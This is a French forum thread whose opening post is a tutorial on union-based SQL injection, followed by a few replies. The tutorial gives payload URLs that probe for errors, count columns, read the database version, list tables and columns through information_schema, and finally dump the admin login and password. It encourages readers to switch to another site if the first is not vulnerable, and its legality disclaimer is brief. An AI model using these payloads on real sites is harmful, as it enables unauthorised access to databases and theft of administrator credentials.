[Tuto] injection sql
Patt
|
Salutation Avant de commencer je rappel que c'est illégal sauf si c'est juste pour faire des tests sur votre site web *blablabla* ni moi, ni kommunauty.fr, ni son hebergeur, si SiMax ne peuvent être tenus responsable de l'usage que vous faites de ce tuto. Une injection sql c'est quoi ? C'est une technique qui permet de récupérer des informations grâce à des commandes SQL. C'est bon, let's go ! Nous avons ici dans l'exemple un site "???" qui correspond à www.???.com/commentaires/comm.php?id=45 Déjà rajoutez dans votre url un caractère spécial : www.???.com/commentaires/comm.php?id=45^ Vous avez donc un message d'erreur sur le site. Exemple : Unknown ligne 100 "order" Si vous n'avez pas de message d'erreur, essayez un autre caractère spécial ou alors changez de site. Maintenant nous allons essayer de trouver le nombre de "colonnes" : Tapez : www.???.com/commentaires/comm.php?id=45+order+by+1-- (Vous n'avez normalement pas d'erreur) www.???.com/commentaires/comm.php?id=45+order+by+100-- (Vous avez normalement une erreur) Maintenant il faut trouver le bon nombre : essayez : www.???.com/commentaires/comm.php?id=45+order+by+90-- www.???.com/commentaires/comm.php?id=45+order+by+80-- www.???.com/commentaires/comm.php?id=45+order+by+70-- Jusqu'à trouver le bon. Dans notre exemple, nous allons dire que l'erreur est à partir de 12. Donc le bon nombre est 11. Donc, maintenant que nous avons le nombre de colonnes tapez : www.???.com/commentaires/comm.php?id=45+union+select+1,2,3,4,5,6,7,8,9,10,11-- Si vous trouvez 5, allez jusque 5, idem pour 15 ou plus. Vous avez normalement un chiffre qui apparait là où était l'erreur sql. Ici, disons que le chiffre est 9. Maintenant il faut trouver la version sql qu'utilise le site : www.???.com/commentaires/comm.php?id=45+union+select+1,2,3,4,5,6,7,8,@@version,10,11-- Remplacez donc 9 par @@version. Maintenant à la place du chiffre 9 vous avez quelque chose dans le genre : 5.0.58-LOG Nous savons désormais que la version de sql est 5.x, donc sa va on peut continuer. Tapez : www.???.com/commentaires/comm.php?id=45+UNION+SELECT+1,2,3,4,5,6,7,8,%20group_concat(table_name),10,11+from+information_schema.tables-- Remplacez donc le chiffre 9 par %20group_concat(table_name). Plusieurs mots sont maintenant visibles. Cherchez en un d'interessant, donc l'exemple : ADMIN. Tapez donc : www.???.com/commentaires/comm.php?id=45+UNION+SELECT+1,2, 3,4,5,6,7,8,group_concat(column_name),10,11+from+information_schema.columns+where+table_name='ADMIN'-- Remplacez donc le chiffre 9 par group_concat(column_name). A ce stade il y a 2 possibilités : Soit le serveur accepte et donc pas de soucis passez l'étape écrite en verte ci-dessous. Soit le serveur n'accepte pas alors vous devez transformer ADMIN en en Hexadécimal. Pour convertir le mot en Hexadécimal rendez vous sur : <a class="postlink" href="http://www.asciitable.com/" target="_blank">http://www.asciitable.com/</a> ADMIN est donc égal à 0x41444D494E. Donc tapez : www.???.com/commentaires/comm.php?id=45+UNION+SELECT+1,2, 3,4,5,6,7,8,group_concat(column_name),10,11+from+information_schema.columns+where+table_name='0x41444D494E'-- (Nous avons remplacer ADMIN par 0x41444D494E) Dans l'exemple nous avons besoin d'identifiants. www.???.com/commentaires/comm.php?id=45+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,LOGIN,PASS),10,11+from+admin-- Remplacez donc le chiffre 9 par concat_ws(0x3a,LOGIN,PASS). Voilà ! Vous avez le login/mdp admin ! Merci d'avoir suivit le tuto.
|
SiMax
|
Merci pour le tutoriel ! Pratique pour savoir comment mieux protéger un site maintenant qu'on sait ça ! C'est facile à protéger mais la plupart des personnes ne prennent pas la peine de le faire... |
Alexou
|
Tu as pas un site pour tester? :kiss: Mais je vois pas, où on apprend à protéger son site, si on se hack soi même, on se protège pas. Et pourquoi, tu met ADMIN en hexa? Et d'où tu peux savoir ce qu'il faut taper dans l'adresse, pour obtenir tout ça (hormis le fais que tu était hacker |
Ancienasgard
|
Si tu teste sur un site qui ne t appartiens pas ou que le propriétaire ne t'a aps donné son autorisation c est ilégal et donc passible de sanction. Testes sur ton site si tu arrive a tout trouvé securise mieu ton site |
|
Alexou
|
Je vais essayer sur Kommunauty Non, jdecc, j'ai tester sur: <a class="postlink" href="http://warspaces.redby.fr/" target="_blank">http://warspaces.redby.fr/</a> Mais ça marche pas, quelqu'un peux m'aider? C'est mon site, donc vous pouvez y allez |
|
Alexou
|
J'ai l'impression que toutes mes questions sont à l'abandon |
Anonyme
|
T'es pas obligé de mettre des '+' pour remplacer les espaces. Exemple: order by1-- a le même effet que order+by+1-- Sinon, merci a+ |
, comme je n'ai rien à faire voici un petit tuto pour faire une injection sql.
)
Kommunauty © Tous droits réservés
Contact /
Charte & Mentions légales /
Hebergement gratuit /
Bon plan hébergement /
Aide B2i
